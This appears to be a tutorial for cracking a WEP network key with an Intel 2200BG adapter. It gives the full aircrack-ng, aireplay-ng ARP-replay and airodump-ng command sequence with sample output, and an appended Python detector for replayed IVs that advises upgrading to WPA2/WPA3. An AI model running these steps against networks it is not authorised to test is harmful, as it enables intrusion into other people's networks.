WEP CRACK WITH INTEL PRO 2200BG (also known as IPW2200)

How to crack

  1. Boot the Linux version of BackTrack 3 or 4 from CD
  2. Turn on the Intel Wireless Pro 2200 BG adapter card (usually it already is)

Getting started:
1.
airmon-ng
The list will show you:
Interface       Chipset         Driver

 rausb0          Airlink        rt73
 eth1            Centrino       ipw2200 
We are going to use eth1 device (ipw2200).

2.
airodump-ng eth1
The response to this is:

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:72:6B:69:0D:40   99        5        0    0  11  54  WEP  WEP         Grab
02:30:B4:65:3D:00  101        8        0    0   7  54. OPN              PLOHL

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes  

3.
In my example I have used the following target as practice:
BSSID = 00:72:6B:69:0D:40
Channel = 11
ESSID = Grab

Determine the MAC address of my Intel PRO 2200BG adapter.
Type:
macchanger -s eth1
Response:

 mac address eth1  48:5b:39:34:71:39
 

MY MAC = 48:5b:39:34:71:39

4.
Associate eth1 with channel 11 and create a virtual rtap interface for receiving, using these commands:

sudo rmmod ipw2200
sudo modprobe ipw2200 rtap_iface=1 channel=11
sudo ifconfig eth1 up
sudo ifconfig rtap0 up

5.
If there are no clients attached (listed) under step 2, then you have no choice but to wait for a client to appear.
Cracking with an ipw2200 bg (Intel Pro 2200 BG or Centrino 2200 BG) card is only successful if there are clients attached to the affected AP.

You must first create a fake connection to the AP.
Type:
iwconfig eth1 essid Grab channel 11 key s:abcde

6.
Now use aireplay-ng with option -2 or -3 to capture and re-send captured ARP packets.
The command is:

 aireplay-ng -3 -b 00:72:6B:69:0D:40 -h 48:5b:39:34:71:39 -x 1024 -g 1000000 -i rtap0 eth1
 


The response is:
 Saving ARP requests in replay_arp-0219-123051.cap
 You should also start airodump-ng to capture replies.
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Or you can use the generated ARP requests from the ASUS card!
Using the command:
aireplay-ng -r arp-replay -i rtap0 eth1

7.
Open a new terminal window and use it to capture the IVs.
Use the command:

airodump-ng -w myfile --bssid 00:72:6B:69:0D:40 --channel 11 --ivs rtap0
The response should be:

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:72:6B:69:0D:40   99        5      123  22  11  54  WEP  WEP         Grab

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
 

And the number under #DATA should be increasing rapidly.

8.
Open another window and run the crack.
Be sure to capture enough IVs under the #Data column (over 50000 for a 40-bit key).
Issue the command:
aircrack-ng -z myfile*.ivs
The response should be:

                                [00:00:00] Tested 29 keys (got 78617 IVs)

   KB    depth   byte(vote)
    0    0/  1   12(41472) F1(36864) 54(35840) 95(34816) 1D(34560) F0(34560) 75(34048) C1(33792)
    1    0/  1   34(40704) FB(35328) E6(34816) 23(34560) F5(34304) 1C(33792) 85(33792) 8E(33792)
    2    0/  3   56(39168) 07(37376) AC(35840) 0C(35328) DA(35328) 94(35072) 14(34816) 8D(34048)
    3    0/  1   78(40960) 42(36352) 19(35584) A0(35328) 11(34560) 17(34304) 2C(34304) 7C(34304)
    4    4/ 10   75(34304) D1(34048) 2B(33792) 60(33792) 81(33792) A9(33792) 40(33536) 73(33536)

                         KEY FOUND! [ 12:34:56:78:90 ]
        Decrypted correctly: 100%  
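
Seen from the monitoring side, the ARP replay in step 6 stands out because the injected frames are copies of one captured packet, so a single transmitter sends the same WEP IV hundreds of times per second while normal clients change IV on every frame. The Python below is an added example, not part of the original page; the record format (timestamp, transmitter MAC, IV), the thresholds and the sample MACs and IVs are constructed assumptions.

```python
from collections import defaultdict


def detect_iv_replay(frames, window_s=1.0, threshold=100):
    """Flag (transmitter, IV) pairs seen >= threshold times within window_s seconds.

    frames: iterable of (timestamp_s, transmitter_mac, iv_hex) for WEP data frames
            (hypothetical record format, e.g. exported from a wireless sensor).
    Returns {(mac, iv): peak count observed inside any single window}.
    """
    seen = defaultdict(list)
    for ts, mac, iv in frames:
        seen[(mac.lower(), iv.lower())].append(ts)

    alerts = {}
    for key, times in seen.items():
        times.sort()
        start, peak = 0, 0
        for end, ts in enumerate(times):
            # Move the window start forward until it spans at most window_s.
            while ts - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


def sample_frames():
    """Constructed capture metadata: one normal client and one replaying station."""
    frames = []
    # Normal client: 40 frames over 2 s, a fresh IV on every frame.
    for i in range(40):
        frames.append((i * 0.05, "02:00:00:00:00:0a", f"{0x1A2B00 + i:06x}"))
    # Replaying station: one frame (one IV) re-sent 500 times at about 1000 frames/s.
    for i in range(500):
        frames.append((1.0 + i * 0.001, "02:00:00:00:00:0b", "7c0139"))
    return frames


if __name__ == "__main__":
    for (mac, iv), peak in detect_iv_replay(sample_frames()).items():
        print(f"possible ARP replay: {mac} reused IV {iv} {peak} times within 1 s")
```

A burst like this on a WEP network, together with the #Data counter climbing as in step 7, is a strong reason to move the access point to WPA2 or WPA3.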
